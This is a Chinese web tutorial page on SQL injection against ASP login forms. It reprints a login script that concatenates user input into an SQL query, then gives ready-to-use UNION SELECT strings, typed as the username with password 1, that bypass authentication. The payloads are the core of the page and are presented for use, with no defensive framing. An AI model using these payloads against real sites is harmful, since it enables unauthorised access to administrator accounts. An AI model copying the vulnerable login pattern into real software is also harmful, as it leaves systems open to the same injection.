• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >安全教程 > ASP注入万能登陆密码

ASP注入万能登陆密码

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了ASP注入万能登陆密码,其中包含asp登陆界面源代码,asp用户登陆界面,asp登陆代码,asp登陆界面代码,asp登陆界面等知识点,遇到此问题的同学们可以参考下
《黑客手册》样刊里面,oldjun提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码:

  程序代码

  <%

  username=trim(Request.Form("username"))

  password=trim(Request.Form("password"))

  sql="Select * FROM admin Where user='"&username&"'"

  Set rs=Server.CreateObject("adodb.recordset")

  rs.Open sql,conn,1,1

  if rs.eof then

  checksysUser=FALSE

  else

  passwd=trim(rs("pwd"))

  if passwd=password then

  Session("admin")=username

  checksysUser=TRUE

  else

  checksysUser=FALSE

  end if

  End if

  rs.close

  conn.close

  if checksysUser=true then

  Response.Redirect("main.asp")

  else

  errmsg="<font color=#FF0000><b>用户名输入有误,请重新输入!</b></font>"

  end if

  %>

  先在数据库中查询用户名对应的密码,然后再和用户输入的密码对比,导致'or'='or'这样的万能登陆密码失效。

  但如果在上面的程序中,用户名输入 程序代码

  ' UNION Select 1,1,1 FROM admin Where ''='

  ,密码输入1,就可以登陆成功,原理很简单,就不多说了。

  顺便附上oldjun的语句:

  程序代码

  ' UNION Select 1,1,1 AS pwd FROM admin Where ''='

</div>

您可能想查找下面的文章:

  • ASP注入万能登陆密码

相关文章

  • 如何多开QQ游戏大厅
  • 黑客入侵网络的五十种方法
  • 神秘的影子帐号揭秘
  • 后门程序技术知识全面讲解
  • webshell 提权方法 服务器提权教程
  • WikkaWiki 1.3.2 Spam Logging PHP注射的方法
  • 黑客侦察目标的几种常用技术
  • 最新黑科技 靠硬盘运作声就可以窃取机内资料
  • 交换机网络嗅探方法 如何欺骗交换机缓存
  • 暴破SAM文件的提权法

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • 最佳的75个黑客安全工具
    • Android平台的SQL注入漏洞浅析(一条短信控制你的手机)
    • PcAnywhere12提权方法
    • 教你如何使用Google黑掉Windows服务器
    • 局域网入侵完全版
    • 如何提高DDoS攻击效率 增强DDoS攻击效果的思路
    • IPSEC野蛮模式的详细介绍(图文教程)
    • 黑客攻击数据库的六大手段
    • 网页挂马详细步骤教程
    • 抓取管理员hash值(哈希)的另类方法

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有